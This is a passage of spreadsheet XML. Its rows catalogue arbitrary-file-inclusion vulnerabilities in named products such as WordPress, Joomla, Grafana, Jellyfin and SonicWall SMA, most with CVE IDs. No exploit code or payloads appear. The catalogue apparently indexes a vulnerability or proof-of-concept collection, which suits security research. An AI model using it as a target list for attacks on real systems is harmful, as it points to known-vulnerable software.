      <c r="F366" s="4" t="s">
        <v>1242</v>
      </c>
    </row>
    <row r="367" s="4" customFormat="1" spans="1:6">
      <c r="A367" s="2" t="s">
        <v>1243</v>
      </c>
      <c r="B367" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C367" s="2" t="s">
        <v>1244</v>
      </c>
      <c r="D367" s="2" t="str">
        <f t="shared" si="5"/>
        <v>Next_任意文件包含_CVE-2020-5284</v>
      </c>
      <c r="E367" s="6" t="s">
        <v>1245</v>
      </c>
      <c r="F367" s="4" t="s">
        <v>1246</v>
      </c>
    </row>
    <row r="368" s="4" customFormat="1" spans="1:6">
      <c r="A368" s="2" t="s">
        <v>1247</v>
      </c>
      <c r="B368" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C368" s="2" t="s">
        <v>1248</v>
      </c>
      <c r="D368" s="2" t="str">
        <f t="shared" si="5"/>
        <v>Oracle Fusion_任意文件包含_CVE-2020-14864</v>
      </c>
      <c r="E368" s="6" t="s">
        <v>1249</v>
      </c>
      <c r="F368" s="4" t="s">
        <v>1250</v>
      </c>
    </row>
    <row r="369" s="4" customFormat="1" spans="1:6">
      <c r="A369" s="2" t="s">
        <v>1251</v>
      </c>
      <c r="B369" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C369" s="2" t="s">
        <v>1252</v>
      </c>
      <c r="D369" s="2" t="str">
        <f t="shared" si="5"/>
        <v>ProcesswireCMS_任意文件包含_CVE-2020-27467</v>
      </c>
      <c r="E369" s="6" t="s">
        <v>1253</v>
      </c>
      <c r="F369" s="4" t="s">
        <v>1254</v>
      </c>
    </row>
    <row r="370" s="4" customFormat="1" spans="1:6">
      <c r="A370" s="2" t="s">
        <v>1255</v>
      </c>
      <c r="B370" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C370" s="2" t="s">
        <v>1256</v>
      </c>
      <c r="D370" s="2" t="str">
        <f t="shared" si="5"/>
        <v>SearchBlox_任意文件包含_CVE-2020-35580</v>
      </c>
      <c r="E370" s="6" t="s">
        <v>1257</v>
      </c>
      <c r="F370" s="4" t="s">
        <v>1258</v>
      </c>
    </row>
    <row r="371" s="4" customFormat="1" spans="1:6">
      <c r="A371" s="2" t="s">
        <v>528</v>
      </c>
      <c r="B371" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C371" s="2" t="s">
        <v>1259</v>
      </c>
      <c r="D371" s="2" t="str">
        <f t="shared" si="5"/>
        <v>Spring_任意文件包含_CVE-2020-5405</v>
      </c>
      <c r="E371" s="6" t="s">
        <v>1260</v>
      </c>
      <c r="F371" s="4" t="s">
        <v>1261</v>
      </c>
    </row>
    <row r="372" s="4" customFormat="1" spans="1:6">
      <c r="A372" s="2" t="s">
        <v>1262</v>
      </c>
      <c r="B372" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C372" s="2" t="s">
        <v>1263</v>
      </c>
      <c r="D372" s="2" t="str">
        <f t="shared" si="5"/>
        <v>ThinkAdmin_任意文件包含_CVE-2020-25540</v>
      </c>
      <c r="E372" s="6" t="s">
        <v>1264</v>
      </c>
      <c r="F372" s="4" t="s">
        <v>1265</v>
      </c>
    </row>
    <row r="373" s="4" customFormat="1" spans="1:6">
      <c r="A373" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B373" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C373" s="2" t="s">
        <v>1266</v>
      </c>
      <c r="D373" s="2" t="str">
        <f t="shared" si="5"/>
        <v>WordPress_任意文件包含_CVE-2020-11738</v>
      </c>
      <c r="E373" s="6" t="s">
        <v>1267</v>
      </c>
      <c r="F373" s="4" t="s">
        <v>1268</v>
      </c>
    </row>
    <row r="374" s="4" customFormat="1" spans="1:6">
      <c r="A374" s="2" t="s">
        <v>1269</v>
      </c>
      <c r="B374" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C374" s="2" t="s">
        <v>1270</v>
      </c>
      <c r="D374" s="2" t="str">
        <f t="shared" si="5"/>
        <v>BIQS IT Biqs_任意文件包含_CVE-2021-39433</v>
      </c>
      <c r="E374" s="6" t="s">
        <v>1271</v>
      </c>
      <c r="F374" s="4" t="s">
        <v>1272</v>
      </c>
    </row>
    <row r="375" s="4" customFormat="1" spans="1:6">
      <c r="A375" s="2" t="s">
        <v>1273</v>
      </c>
      <c r="B375" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C375" s="2" t="s">
        <v>1274</v>
      </c>
      <c r="D375" s="2" t="str">
        <f t="shared" si="5"/>
        <v>Draytek VigorConnect_任意文件包含_CVE-2021-20123</v>
      </c>
      <c r="E375" s="6" t="s">
        <v>1275</v>
      </c>
      <c r="F375" s="4" t="s">
        <v>1276</v>
      </c>
    </row>
    <row r="376" s="4" customFormat="1" spans="1:6">
      <c r="A376" s="2" t="s">
        <v>1277</v>
      </c>
      <c r="B376" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C376" s="2" t="s">
        <v>1278</v>
      </c>
      <c r="D376" s="2" t="str">
        <f t="shared" si="5"/>
        <v>FAUST iServer_任意文件包含_CVE-2021-34805</v>
      </c>
      <c r="E376" s="6" t="s">
        <v>1279</v>
      </c>
      <c r="F376" s="4" t="s">
        <v>1280</v>
      </c>
    </row>
    <row r="377" s="4" customFormat="1" spans="1:6">
      <c r="A377" s="2" t="s">
        <v>1281</v>
      </c>
      <c r="B377" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C377" s="2" t="s">
        <v>1282</v>
      </c>
      <c r="D377" s="2" t="str">
        <f t="shared" si="5"/>
        <v>Hongdian H Devices_任意文件包含_CVE-2021-28149</v>
      </c>
      <c r="E377" s="6" t="s">
        <v>1283</v>
      </c>
      <c r="F377" s="4" t="s">
        <v>1284</v>
      </c>
    </row>
    <row r="378" s="4" customFormat="1" spans="1:6">
      <c r="A378" s="2" t="s">
        <v>1285</v>
      </c>
      <c r="B378" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C378" s="2" t="s">
        <v>1286</v>
      </c>
      <c r="D378" s="2" t="str">
        <f t="shared" si="5"/>
        <v>Hue Magic_任意文件包含_CVE-2021-25864</v>
      </c>
      <c r="E378" s="6" t="s">
        <v>1287</v>
      </c>
      <c r="F378" s="4" t="s">
        <v>1288</v>
      </c>
    </row>
    <row r="379" s="4" customFormat="1" spans="1:6">
      <c r="A379" s="2" t="s">
        <v>1289</v>
      </c>
      <c r="B379" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C379" s="2" t="s">
        <v>1290</v>
      </c>
      <c r="D379" s="2" t="str">
        <f t="shared" si="5"/>
        <v>Ivanti Avalanche_任意文件包含_CVE-2021-30497</v>
      </c>
      <c r="E379" s="6" t="s">
        <v>1291</v>
      </c>
      <c r="F379" s="4" t="s">
        <v>1292</v>
      </c>
    </row>
    <row r="380" s="4" customFormat="1" spans="1:6">
      <c r="A380" s="2" t="s">
        <v>1293</v>
      </c>
      <c r="B380" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C380" s="2" t="s">
        <v>1294</v>
      </c>
      <c r="D380" s="2" t="str">
        <f t="shared" si="5"/>
        <v>Jellyfin_任意文件包含_CVE-2021-21402</v>
      </c>
      <c r="E380" s="6" t="s">
        <v>1295</v>
      </c>
      <c r="F380" s="4" t="s">
        <v>1296</v>
      </c>
    </row>
    <row r="381" s="4" customFormat="1" spans="1:6">
      <c r="A381" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B381" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C381" s="2" t="s">
        <v>1297</v>
      </c>
      <c r="D381" s="2" t="str">
        <f t="shared" si="5"/>
        <v>Joomla_任意文件包含_CVE-2021-28377</v>
      </c>
      <c r="E381" s="6" t="s">
        <v>1298</v>
      </c>
      <c r="F381" s="4" t="s">
        <v>1299</v>
      </c>
    </row>
    <row r="382" s="4" customFormat="1" spans="1:6">
      <c r="A382" s="2" t="s">
        <v>1300</v>
      </c>
      <c r="B382" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C382" s="2" t="s">
        <v>1301</v>
      </c>
      <c r="D382" s="2" t="str">
        <f t="shared" si="5"/>
        <v>MERCUSYS Mercury X Router_任意文件包含_CVE-2021-23241</v>
      </c>
      <c r="E382" s="6" t="s">
        <v>1302</v>
      </c>
      <c r="F382" s="4" t="s">
        <v>1303</v>
      </c>
    </row>
    <row r="383" s="4" customFormat="1" spans="1:6">
      <c r="A383" s="2" t="s">
        <v>608</v>
      </c>
      <c r="B383" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C383" s="2" t="s">
        <v>1304</v>
      </c>
      <c r="D383" s="2" t="str">
        <f t="shared" si="5"/>
        <v>Metabase_任意文件包含_CVE-2021-41277</v>
      </c>
      <c r="E383" s="6" t="s">
        <v>1305</v>
      </c>
      <c r="F383" s="4" t="s">
        <v>1306</v>
      </c>
    </row>
    <row r="384" s="4" customFormat="1" spans="1:6">
      <c r="A384" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B384" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C384" s="2" t="s">
        <v>1307</v>
      </c>
      <c r="D384" s="2" t="str">
        <f t="shared" si="5"/>
        <v>WordPress_任意文件包含_CVE-2021-24227</v>
      </c>
      <c r="E384" s="6" t="s">
        <v>1308</v>
      </c>
      <c r="F384" s="4" t="s">
        <v>1309</v>
      </c>
    </row>
    <row r="385" s="4" customFormat="1" spans="1:6">
      <c r="A385" s="2" t="s">
        <v>1310</v>
      </c>
      <c r="B385" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C385" s="2" t="s">
        <v>1311</v>
      </c>
      <c r="D385" s="2" t="str">
        <f t="shared" si="5"/>
        <v>TermTalk Server_任意文件包含_CVE-2021-35380</v>
      </c>
      <c r="E385" s="6" t="s">
        <v>1312</v>
      </c>
      <c r="F385" s="4" t="s">
        <v>1313</v>
      </c>
    </row>
    <row r="386" s="4" customFormat="1" spans="1:6">
      <c r="A386" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B386" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C386" s="2" t="s">
        <v>1314</v>
      </c>
      <c r="D386" s="2" t="str">
        <f t="shared" ref="D386:D449" si="6">_xlfn.TEXTJOIN("_",TRUE,A386:C386)</f>
        <v>WordPress_任意文件包含_CVE-2021-39316</v>
      </c>
      <c r="E386" s="6" t="s">
        <v>1315</v>
      </c>
      <c r="F386" s="4" t="s">
        <v>1316</v>
      </c>
    </row>
    <row r="387" s="4" customFormat="1" spans="1:6">
      <c r="A387" s="2" t="s">
        <v>1317</v>
      </c>
      <c r="B387" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C387" s="2" t="s">
        <v>1318</v>
      </c>
      <c r="D387" s="2" t="str">
        <f t="shared" si="6"/>
        <v>kkFileview_任意文件包含_CVE-2021-43734</v>
      </c>
      <c r="E387" s="6" t="s">
        <v>1319</v>
      </c>
      <c r="F387" s="4" t="s">
        <v>1320</v>
      </c>
    </row>
    <row r="388" s="4" customFormat="1" spans="1:6">
      <c r="A388" s="2" t="s">
        <v>443</v>
      </c>
      <c r="B388" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C388" s="2" t="s">
        <v>1321</v>
      </c>
      <c r="D388" s="2" t="str">
        <f t="shared" si="6"/>
        <v>Apache_任意文件包含_CVE-2022-47501</v>
      </c>
      <c r="E388" s="6" t="s">
        <v>1322</v>
      </c>
      <c r="F388" s="4" t="s">
        <v>1323</v>
      </c>
    </row>
    <row r="389" s="4" customFormat="1" spans="1:6">
      <c r="A389" s="2" t="s">
        <v>1324</v>
      </c>
      <c r="B389" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C389" s="2" t="s">
        <v>1325</v>
      </c>
      <c r="D389" s="2" t="str">
        <f t="shared" si="6"/>
        <v>BigAnt Server_任意文件包含_CVE-2022-23347</v>
      </c>
      <c r="E389" s="6" t="s">
        <v>1326</v>
      </c>
      <c r="F389" s="4" t="s">
        <v>1327</v>
      </c>
    </row>
    <row r="390" s="4" customFormat="1" spans="1:6">
      <c r="A390" s="2" t="s">
        <v>1328</v>
      </c>
      <c r="B390" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C390" s="2" t="s">
        <v>1329</v>
      </c>
      <c r="D390" s="2" t="str">
        <f t="shared" si="6"/>
        <v>DVDFab Player/PlayerFab_任意文件包含_CVE-2022-25216</v>
      </c>
      <c r="E390" s="6" t="s">
        <v>1330</v>
      </c>
      <c r="F390" s="4" t="s">
        <v>1331</v>
      </c>
    </row>
    <row r="391" s="4" customFormat="1" spans="1:6">
      <c r="A391" s="2" t="s">
        <v>1332</v>
      </c>
      <c r="B391" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C391" s="2" t="s">
        <v>1333</v>
      </c>
      <c r="D391" s="2" t="str">
        <f t="shared" si="6"/>
        <v>Gitblit_任意文件包含_CVE-2022-31268</v>
      </c>
      <c r="E391" s="6" t="s">
        <v>1334</v>
      </c>
      <c r="F391" s="4" t="s">
        <v>1335</v>
      </c>
    </row>
    <row r="392" s="4" customFormat="1" spans="1:6">
      <c r="A392" s="2" t="s">
        <v>1336</v>
      </c>
      <c r="B392" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C392" s="2" t="s">
        <v>1337</v>
      </c>
      <c r="D392" s="2" t="str">
        <f t="shared" si="6"/>
        <v>LearnPress Plugin_任意文件包含_CVE-2022-47615</v>
      </c>
      <c r="E392" s="6" t="s">
        <v>1338</v>
      </c>
      <c r="F392" s="4" t="s">
        <v>1339</v>
      </c>
    </row>
    <row r="393" s="4" customFormat="1" spans="1:6">
      <c r="A393" s="2" t="s">
        <v>1340</v>
      </c>
      <c r="B393" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C393" s="2" t="s">
        <v>1341</v>
      </c>
      <c r="D393" s="2" t="str">
        <f t="shared" si="6"/>
        <v>Omnia MPX_任意文件包含_CVE-2022-36642</v>
      </c>
      <c r="E393" s="6" t="s">
        <v>1342</v>
      </c>
      <c r="F393" s="4" t="s">
        <v>1343</v>
      </c>
    </row>
    <row r="394" s="4" customFormat="1" spans="1:6">
      <c r="A394" s="2" t="s">
        <v>1344</v>
      </c>
      <c r="B394" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C394" s="2" t="s">
        <v>1345</v>
      </c>
      <c r="D394" s="2" t="str">
        <f t="shared" si="6"/>
        <v>Piano LED Visualizer_任意文件包含_CVE-2022-24900</v>
      </c>
      <c r="E394" s="6" t="s">
        <v>1346</v>
      </c>
      <c r="F394" s="4" t="s">
        <v>1347</v>
      </c>
    </row>
    <row r="395" s="4" customFormat="1" spans="1:6">
      <c r="A395" s="2" t="s">
        <v>1348</v>
      </c>
      <c r="B395" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C395" s="2" t="s">
        <v>1349</v>
      </c>
      <c r="D395" s="2" t="str">
        <f t="shared" si="6"/>
        <v>SolarView Compact_任意文件包含_CVE-2022-29298</v>
      </c>
      <c r="E395" s="6" t="s">
        <v>1350</v>
      </c>
      <c r="F395" s="4" t="s">
        <v>1351</v>
      </c>
    </row>
    <row r="396" s="4" customFormat="1" spans="1:6">
      <c r="A396" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B396" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C396" s="2" t="s">
        <v>1352</v>
      </c>
      <c r="D396" s="2" t="str">
        <f t="shared" si="6"/>
        <v>WordPress_任意文件包含_CVE-2022-4063</v>
      </c>
      <c r="E396" s="6" t="s">
        <v>1353</v>
      </c>
      <c r="F396" s="4" t="s">
        <v>1354</v>
      </c>
    </row>
    <row r="397" s="4" customFormat="1" spans="1:6">
      <c r="A397" s="2" t="s">
        <v>1355</v>
      </c>
      <c r="B397" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C397" s="2" t="s">
        <v>1356</v>
      </c>
      <c r="D397" s="2" t="str">
        <f t="shared" si="6"/>
        <v>Gibbon_任意文件包含_CVE-2023-34598</v>
      </c>
      <c r="E397" s="6" t="s">
        <v>1357</v>
      </c>
      <c r="F397" s="4" t="s">
        <v>1358</v>
      </c>
    </row>
    <row r="398" s="4" customFormat="1" spans="1:6">
      <c r="A398" s="2" t="s">
        <v>1359</v>
      </c>
      <c r="B398" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C398" s="2" t="s">
        <v>1360</v>
      </c>
      <c r="D398" s="2" t="str">
        <f t="shared" si="6"/>
        <v>Jeecg P Biz Chat_任意文件包含_CVE-2023-33510</v>
      </c>
      <c r="E398" s="6" t="s">
        <v>1361</v>
      </c>
      <c r="F398" s="4" t="s">
        <v>1362</v>
      </c>
    </row>
    <row r="399" s="4" customFormat="1" spans="1:6">
      <c r="A399" s="2" t="s">
        <v>1363</v>
      </c>
      <c r="B399" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C399" s="2" t="s">
        <v>1364</v>
      </c>
      <c r="D399" s="2" t="str">
        <f t="shared" si="6"/>
        <v>Nuovo Spreadsheet Reader_任意文件包含_CVE-2023-29887</v>
      </c>
      <c r="E399" s="6" t="s">
        <v>1365</v>
      </c>
      <c r="F399" s="4" t="s">
        <v>1366</v>
      </c>
    </row>
    <row r="400" s="4" customFormat="1" spans="1:6">
      <c r="A400" s="2" t="s">
        <v>1367</v>
      </c>
      <c r="B400" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C400" s="2" t="s">
        <v>1368</v>
      </c>
      <c r="D400" s="2" t="str">
        <f t="shared" si="6"/>
        <v>ShokoServer System_任意文件包含_CVE-2023-43662</v>
      </c>
      <c r="E400" s="6" t="s">
        <v>1369</v>
      </c>
      <c r="F400" s="4" t="s">
        <v>1370</v>
      </c>
    </row>
    <row r="401" s="4" customFormat="1" spans="1:6">
      <c r="A401" s="2" t="s">
        <v>1371</v>
      </c>
      <c r="B401" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C401" s="2" t="s">
        <v>1372</v>
      </c>
      <c r="D401" s="2" t="str">
        <f t="shared" si="6"/>
        <v>SonicWall SMA LFI_任意文件包含_CVE-2023-0126</v>
      </c>
      <c r="E401" s="6" t="s">
        <v>1373</v>
      </c>
      <c r="F401" s="4" t="s">
        <v>1374</v>
      </c>
    </row>
    <row r="402" s="4" customFormat="1" spans="1:6">
      <c r="A402" s="2" t="s">
        <v>1375</v>
      </c>
      <c r="B402" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C402" s="2" t="s">
        <v>1376</v>
      </c>
      <c r="D402" s="2" t="str">
        <f t="shared" si="6"/>
        <v>Artica Proxy_任意文件包含_CVE-2024-2053</v>
      </c>
      <c r="E402" s="6" t="s">
        <v>1377</v>
      </c>
      <c r="F402" s="4" t="s">
        <v>1378</v>
      </c>
    </row>
    <row r="403" s="4" customFormat="1" spans="1:6">
      <c r="A403" s="2" t="s">
        <v>1379</v>
      </c>
      <c r="B403" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C403" s="2" t="s">
        <v>1380</v>
      </c>
      <c r="D403" s="2" t="str">
        <f t="shared" si="6"/>
        <v>Devika_任意文件包含_CVE-2024-5334</v>
      </c>
      <c r="E403" s="6" t="s">
        <v>1381</v>
      </c>
      <c r="F403" s="4" t="s">
        <v>1382</v>
      </c>
    </row>
    <row r="404" s="4" customFormat="1" spans="1:6">
      <c r="A404" s="2" t="s">
        <v>1383</v>
      </c>
      <c r="B404" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C404" s="2" t="s">
        <v>1384</v>
      </c>
      <c r="D404" s="2" t="str">
        <f t="shared" si="6"/>
        <v>Docassemble_任意文件包含_CVE-2024-27292</v>
      </c>
      <c r="E404" s="6" t="s">
        <v>1385</v>
      </c>
      <c r="F404" s="4" t="s">
        <v>1386</v>
      </c>
    </row>
    <row r="405" s="4" customFormat="1" spans="1:6">
      <c r="A405" s="2" t="s">
        <v>1387</v>
      </c>
      <c r="B405" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C405" s="2" t="s">
        <v>1388</v>
      </c>
      <c r="D405" s="2" t="str">
        <f t="shared" si="6"/>
        <v>MasterSAM Star Gate_任意文件包含_CVE-2024-55457</v>
      </c>
      <c r="E405" s="6" t="s">
        <v>1389</v>
      </c>
      <c r="F405" s="4" t="s">
        <v>1390</v>
      </c>
    </row>
    <row r="406" s="4" customFormat="1" spans="1:6">
      <c r="A406" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B406" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C406" s="2" t="s">
        <v>1391</v>
      </c>
      <c r="D406" s="2" t="str">
        <f t="shared" si="6"/>
        <v>WordPress_任意文件包含_CVE-2024-12209</v>
      </c>
      <c r="E406" s="6" t="s">
        <v>1392</v>
      </c>
      <c r="F406" s="4" t="s">
        <v>1393</v>
      </c>
    </row>
    <row r="407" s="4" customFormat="1" spans="1:6">
      <c r="A407" s="2" t="s">
        <v>1394</v>
      </c>
      <c r="B407" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C407" s="2" t="s">
        <v>1395</v>
      </c>
      <c r="D407" s="2" t="str">
        <f t="shared" si="6"/>
        <v>Kubio AI Page Builder_任意文件包含_CVE-2025-2294</v>
      </c>
      <c r="E407" s="6" t="s">
        <v>1396</v>
      </c>
      <c r="F407" s="4" t="s">
        <v>1397</v>
      </c>
    </row>
    <row r="408" s="4" customFormat="1" spans="1:6">
      <c r="A408" s="2" t="s">
        <v>1398</v>
      </c>
      <c r="B408" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C408" s="2" t="s">
        <v>1399</v>
      </c>
      <c r="D408" s="2" t="str">
        <f t="shared" si="6"/>
        <v>Moodle Jmol Filter_任意文件包含_CVE-2025-34031</v>
      </c>
      <c r="E408" s="6" t="s">
        <v>1400</v>
      </c>
      <c r="F408" s="4" t="s">
        <v>1401</v>
      </c>
    </row>
    <row r="409" s="4" customFormat="1" spans="1:6">
      <c r="A409" s="2" t="s">
        <v>443</v>
      </c>
      <c r="B409" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C409" s="2"/>
      <c r="D409" s="2" t="str">
        <f t="shared" si="6"/>
        <v>Apache_任意文件包含</v>
      </c>
      <c r="E409" s="6" t="s">
        <v>1402</v>
      </c>
      <c r="F409" s="4" t="s">
        <v>1403</v>
      </c>
    </row>
    <row r="410" s="4" customFormat="1" spans="1:6">
      <c r="A410" s="2" t="s">
        <v>175</v>
      </c>
      <c r="B410" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C410" s="2"/>
      <c r="D410" s="2" t="str">
        <f t="shared" si="6"/>
        <v>帆软_任意文件包含</v>
      </c>
      <c r="E410" s="6" t="s">
        <v>1404</v>
      </c>
      <c r="F410" s="4" t="s">
        <v>1405</v>
      </c>
    </row>
    <row r="411" s="4" customFormat="1" spans="1:6">
      <c r="A411" s="2" t="s">
        <v>1406</v>
      </c>
      <c r="B411" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C411" s="2"/>
      <c r="D411" s="2" t="str">
        <f t="shared" si="6"/>
        <v>Grafana_任意文件包含</v>
      </c>
      <c r="E411" s="6" t="s">
        <v>1407</v>
      </c>
      <c r="F411" s="4" t="s">
        <v>1408</v>
      </c>
    </row>
    <row r="412" s="4" customFormat="1" spans="1:6">
      <c r="A412" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B412" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C412" s="2"/>
      <c r="D412" s="2" t="str">
        <f t="shared" si="6"/>
        <v>Joomla_任意文件包含</v>
      </c>
      <c r="E412" s="6" t="s">
        <v>1409</v>
      </c>
      <c r="F412" s="4" t="s">
        <v>1410</v>
      </c>
    </row>
    <row r="413" s="4" customFormat="1" spans="1:6">
      <c r="A413" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B413" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C413" s="2"/>
      <c r="D413" s="2" t="str">
        <f t="shared" si="6"/>
        <v>Joomla_任意文件包含</v>
      </c>
      <c r="E413" s="6" t="s">
        <v>1411</v>
      </c>
      <c r="F413" s="4" t="s">
        <v>1412</v>
      </c>
    </row>
    <row r="414" s="4" customFormat="1" spans="1:6">
      <c r="A414" s="2" t="s">
        <v>1413</v>
      </c>
      <c r="B414" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C414" s="2"/>
      <c r="D414" s="2" t="str">
        <f t="shared" si="6"/>
        <v>AsanhamayeshCMS_任意文件包含</v>
      </c>
      <c r="E414" s="6" t="s">
        <v>1414</v>
      </c>
      <c r="F414" s="4" t="s">
        <v>1415</v>
      </c>
    </row>
    <row r="415" s="4" customFormat="1" spans="1:6">
      <c r="A415" s="2" t="s">
        <v>1416</v>
      </c>
      <c r="B415" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C415" s="2"/>
      <c r="D415" s="2" t="str">
        <f t="shared" si="6"/>
        <v>Carel pCOWeb HVAC BACnet Gateway_任意文件包含</v>
      </c>
      <c r="E415" s="6" t="s">
        <v>1417</v>
      </c>
      <c r="F415" s="4" t="s">
        <v>1418</v>
      </c>
    </row>
    <row r="416" s="4" customFormat="1" spans="1:6">
      <c r="A416" s="2" t="s">
        <v>1419</v>
      </c>
      <c r="B416" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C416" s="2"/>
      <c r="D416" s="2" t="str">
        <f t="shared" si="6"/>
        <v>FastBee_任意文件包含</v>
      </c>
      <c r="E416" s="6" t="s">
        <v>1420</v>
      </c>
      <c r="F416" s="4" t="s">
        <v>1421</v>
      </c>
    </row>
    <row r="417" s="4" customFormat="1" spans="1:6">
      <c r="A417" s="2" t="s">
        <v>1422</v>
      </c>
      <c r="B417" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C417" s="2"/>
      <c r="D417" s="2" t="str">
        <f t="shared" si="6"/>
        <v>FeiFeiCMS_任意文件包含</v>
      </c>
      <c r="E417" s="6" t="s">
        <v>1423</v>
      </c>
      <c r="F417" s="4" t="s">
        <v>1424</v>
      </c>
    </row>
    <row r="418" s="4" customFormat="1" spans="1:6">
      <c r="A418" s="2" t="s">
        <v>425</v>
      </c>
      <c r="B418" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C418" s="2"/>
      <c r="D418" s="2" t="str">
        <f t="shared" si="6"/>
        <v>GeoVision Geowebserver_任意文件包含</v>
      </c>
      <c r="E418" s="6" t="s">
        <v>1425</v>
      </c>
      <c r="F418" s="4" t="s">
        <v>1426</v>
      </c>
    </row>
    <row r="419" s="4" customFormat="1" spans="1:6">
      <c r="A419" s="2" t="s">
        <v>1427</v>
      </c>
      <c r="B419" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C419" s="2"/>
      <c r="D419" s="2" t="str">
        <f t="shared" si="6"/>
        <v>Hrsale_任意文件包含</v>
      </c>
      <c r="E419" s="6" t="s">
        <v>1428</v>
      </c>
      <c r="F419" s="4" t="s">
        <v>1429</v>
      </c>
    </row>
    <row r="420" s="4" customFormat="1" spans="1:6">
      <c r="A420" s="2" t="s">
        <v>1430</v>
      </c>
      <c r="B420" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C420" s="2"/>
      <c r="D420" s="2" t="str">
        <f t="shared" si="6"/>
        <v>Interlib_任意文件包含</v>
      </c>
      <c r="E420" s="6" t="s">
        <v>1431</v>
      </c>
      <c r="F420" s="4" t="s">
        <v>1432</v>
      </c>
    </row>
    <row r="421" s="4" customFormat="1" spans="1:6">
      <c r="A421" s="2" t="s">
        <v>1433</v>
      </c>
      <c r="B421" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C421" s="2"/>
      <c r="D421" s="2" t="str">
        <f t="shared" si="6"/>
        <v>JEEWMS_任意文件包含</v>
      </c>
      <c r="E421" s="6" t="s">
        <v>1434</v>
      </c>
      <c r="F421" s="4" t="s">
        <v>1435</v>
      </c>
    </row>
    <row r="422" s="4" customFormat="1" spans="1:6">
      <c r="A422" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B422" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C422" s="2"/>
      <c r="D422" s="2" t="str">
        <f t="shared" si="6"/>
        <v>Joomla_任意文件包含</v>
      </c>
      <c r="E422" s="6" t="s">
        <v>1436</v>
      </c>
      <c r="F422" s="4" t="s">
        <v>1437</v>
      </c>
    </row>
    <row r="423" s="4" customFormat="1" spans="1:6">
      <c r="A423" s="2" t="s">
        <v>1438</v>
      </c>
      <c r="B423" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C423" s="2"/>
      <c r="D423" s="2" t="str">
        <f t="shared" si="6"/>
        <v>Karel IP手机web管理平台_任意文件包含</v>
      </c>
      <c r="E423" s="6" t="s">
        <v>1439</v>
      </c>
      <c r="F423" s="4" t="s">
        <v>1440</v>
      </c>
    </row>
    <row r="424" s="4" customFormat="1" spans="1:6">
      <c r="A424" s="2" t="s">
        <v>1441</v>
      </c>
      <c r="B424" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C424" s="2"/>
      <c r="D424" s="2" t="str">
        <f t="shared" si="6"/>
        <v>Kavita_任意文件包含</v>
      </c>
      <c r="E424" s="6" t="s">
        <v>1442</v>
      </c>
      <c r="F424" s="4" t="s">
        <v>1443</v>
      </c>
    </row>
    <row r="425" s="4" customFormat="1" spans="1:6">
      <c r="A425" s="2" t="s">
        <v>1444</v>
      </c>
      <c r="B425" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C425" s="2"/>
      <c r="D425" s="2" t="str">
        <f t="shared" si="6"/>
        <v>Longjing API_任意文件包含</v>
      </c>
      <c r="E425" s="6" t="s">
        <v>1445</v>
      </c>
      <c r="F425" s="4" t="s">
        <v>1446</v>
      </c>
    </row>
    <row r="426" s="4" customFormat="1" spans="1:6">
      <c r="A426" s="2" t="s">
        <v>1447</v>
      </c>
      <c r="B426" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C426" s="2"/>
